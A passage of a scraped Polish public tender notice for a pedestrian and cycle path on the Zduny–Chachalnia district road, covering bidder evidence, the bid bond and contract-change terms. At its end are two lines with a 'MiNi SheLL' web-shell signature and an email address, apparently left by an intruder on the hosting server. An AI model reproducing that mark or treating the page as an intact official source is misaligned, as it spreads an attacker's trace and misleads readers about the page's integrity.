Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp, tj. o niepodleganiu wykluczeniu i spełnieniu warunków<br/>udziału w postępowaniu. Treść oświadczenia stanowi załącznik nr 3 do SWZ;<br/>2. Oświadczenie, o którym mowa powyżej stanowi dowód potwierdzający brak podstaw wykluczenia,<br/>spełnienia warunków udziału w postępowaniu, odpowiednio na dzień składania ofert; stanowi dowód<br/>tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (dotyczy spółek cywilnych,<br/>Konsorcjum), oświadczenie, o którym mowa w pkt 1, składa każdy z Wykonawców.<br/>4. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz z oświadczeniem o którym mowa w pkt. 1, także oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio<br/>spełnianie warunków udziału w postępowaniu w zakresie w jakim wykonawca powołuje się na jego<br/>zasoby.<br/>5. Jeżeli zachodzą podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są<br/>już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia<br/>wszystkich lub niektórych podmiotowych środków dowodowych aktualnych na dzień ich złożenia.<br/>Na potwierdzenie spełnienia warunków udziału w postępowaniu:<br/>a) Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie<br/>mniejszą niż 1.000.000,00 zł (słownie: jeden milion złotych) wraz z tym dokumentem należy przedłożyć<br/>dowód opłaty. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć ww. dokumentu<br/>dotyczącego sytuacji finansowej lub ekonomicznej wymaganego przez zamawiającego, wykonawca<br/>może złożyć inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez<br/>zamawiającego warunku udziału w postępowaniu.<br/>b) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi<br/>stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy<br/>te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały<br/>wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów– inne odpowiednie dokumenty. Wykonał jedną<br/>(1) robotę drogową, polegające w szczególności na budowie/przebudowie/ modernizacji dróg/ulic w<br/>tym wykonanie nawierzchni bitumicznych i budowy ścieżek pieszo – rowerowych o wartości nie<br/>mniejszej niż 2.000.000,00 zł brutto<br/>c) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami.<br/>d) Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz robót budowlanych, w których wykonaniu wykonawca<br/>bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Odpis lub informacji z Krajowego Rejestru Sądowego lub Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt. 4 ustawy Pzp,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji.<br/>2. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego.<br/>3. Oświadczenie o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r., poz. 1076 i 1086), z innym<br/>Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie<br/>od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zmówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi<br/>stosunków prawnych.<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>3) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Treść oświadczenia stanowi załącznik nr 5<br/>do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w 75.000,00 zł<br/> (słownie: siedemdziesiąt pięć tysięcy złotych 00/100).<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków o których mowa w art. 98 ust. 1 pkt. 2 i 3 oraz <br/>ust. 2 ustawy Pzp.<br/>Przedłużenie związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo jeżeli nie jest to możliwe z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>a)	pieniądzu,<br/>b)	gwarancjach bankowych<br/>c)	gwarancjach ubezpieczeniowych<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. (Dz. U. z 2020 poz. 299).<br/>	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w PKO BP O/Krotoszyn 59 1020 2267 0000 4402 0004 2317 z adnotacją: Wadium - Budowa ścieżki pieszo - rowerowej droga powiatowa 5165P Zduny - Chachalnia od km 0+200 do km 2+535 .<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania <br/> rachunku Zamawiającego.<br/>Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 4 ppkt b-d <br/>wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej<br/>Zamawiający zatrzyma wadium w sytuacji wystąpienia ustawowych podstaw do jego zatrzymania. <br/>określonych w art. 98 ust. 6 ustawy Pzp.<br/> Jeżeli wadium nie zostanie wniesione lub zostanie wniesione w sposób nieprawidłowy, zgodnie z zapisami <br/>art. 226 ust. 1 pkt 14 ustawy PZP Zamawiający odrzuci taką ofertę lub wykonawca nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku o którym mowa w art. 98 ust. Pkt. 3. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) W przypadku o którym mowa powyżej, Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3) Zamawiający nie może wymagać od Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiadania określonej formy prawnej w celu złożenia oferty.<br/>4) Jeżeli została wybrana oferty Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>5) Zamawiający może określić szczególny, obiektywnie uzasadniony, sposób spełnienia przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w<br/>postępowaniu, jeżeli jest to uzasadnione charakterem zamówienia i jest proporcjonalne.<br/>6) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej jest spełniony, jeśli co najmniej jeden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których<br/>realizacji te uprawnienia są wymagane.<br/>7) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>8) W przypadku, o którym mowa w pkt 6) i 7) – Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni Wykonawcy. Treść oświadczenia stanowi załącznik 4<br/>do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień umowy w stosunku do treści złożonej oferty na podstawie której,<br/>dokonano wyboru Wykonawcy jest możliwa w przypadku zaistnienia okoliczności określonych w<br/>art. 455 ustawy Pzp i przewidzianych w SWZ.<br/>2. Ponadto zamawiający przewiduje możliwość zmiany postanowień zawartej umowy, w<br/>stosunku do treści na podstawie której dokonano wyboru wykonawcy, w przypadku:<br/>a) działania siły wyższej, mającej bezpośredni wpływ na termin wykonania robót(np. klęski<br/>żywiołowe, strajki),o ilość dni w których te okoliczności wystąpią,<br/>b) wystąpienia niekorzystnych warunków atmosferycznych powodujących konieczność<br/>przerwania robót potwierdzonych przez inspektora nadzoru wpisem do dziennika budowy.<br/>Zamawiający dopuszcza możliwość przedłużenia terminu przewidzianego na realizację<br/>zamówienia, o ilość dni w których te warunki wystąpią,<br/>c). zmiany kluczowego personelu Zamawiającego lub Wykonawcy- spełniającego wymagania<br/>zawarte<br/>w SWZ /po uzgodnieniu z Zamawiającym/,<br/>d). wykonania robót dodatkowych o ile stały się niezbędne i zostały spełnione przesłanki<br/>ustawowemające<br/>wpływ na prawidłowe wykonanie przedmiotu umowy, których realizacja powoduje<br/>konieczność przedłużenia terminu umowy podstawowej. Zmawiający dopuszcza przedłużenie<br/>terminu realizacji umowy o okres niezbędny do realizacji w/w robót. Zamawiający zmieni<br/>wysokość<br/>wynagrodzenia wykonawcy.<br/>3. W przypadku wystąpienia robót niezbędnych do realizacji umowy, a nieujętych przedmiarze<br/>robót, Zamawiający dopuszcza zmiany wynagrodzenia. Podstawą wyliczenia wynagrodzenia za<br/>te roboty będzie:<br/>a) cena uzyskana poprzez porównanie do cen jednostkowych z cennika SEKOCENBUD robót<br/>podstawowych określonych w kosztorysie ofertowym Wykonawcy,<br/>b) w przypadku braku w podstawowym kosztorysie ofertowym pozycji, której cenę można<br/>zastosować do wyceny nowej roboty, to cenę tej roboty należy wyliczyć w oparciu o cenę<br/>rynkową danych robót z zastrzeżeniem, że cena nie może przekroczyć średniej stawki z cennika<br/>SEKOCENBUD za kwartał poprzedzający sporządzenie wyceny. Każda zmiana musi być<br/>poprzedzona sporządzeniem protokołu konieczności oraz protokołu z negocjacji.<br/>4. Strony zobowiązują się dokonać zmiany wysokości Wynagrodzenia, w formie aneksu do<br/>Umowy, każdorazowo w przypadku wystąpienia jednej z następujących okoliczności dotyczącej<br/>zmiany:<br/>1) stawki podatku od towarów i usług: strony ustalają protokolarnie wartość<br/>robót wykonanej wg stanu na dzień poprzedzający zmianę stawki podatku<br/>VAT. Nowa stawka podatku będzie miała zastosowanie do elementów Przedmiotu<br/>Umowy wykonywanych po dniu zmiany stawki podatku VAT,<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki<br/>godzinowej, ustalonych na podstawie przepisów ustawy z dnia 19 lipca 2019 roku o<br/>zmianie ustawy o minimalnym wynagrodzeniu za pracę; Wykonawca przedkłada<br/>Zamawiającemu wykaz zatrudnianych do realizacji Umowy pracowników, dla których<br/>ma zastosowanie zmiana wraz z kalkulacją kosztów wynikającą z przedmiotowej<br/>zmiany, 3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne: Wykonawca<br/>przedkłada Zamawiającemu wykaz pracowników, którzy realizują Umowę i dla<br/>których ma zastosowanie zmiana wraz z kalkulacją kosztów wynikającą z<br/>przedmiotowej zmiany, na zasadach i w sposób określony w ust. 7 - 18, jeżeli zmiany<br/>te będą miały wpływ na koszty wykonania Umowy przez Wykonawcę,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach<br/>kapitałowych, jeżeli zmiany te będą miały wpływ na koszty wykonania Umowy przez<br/>Wykonawcę.<br/>7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pzd_krotoszyn</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-20 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com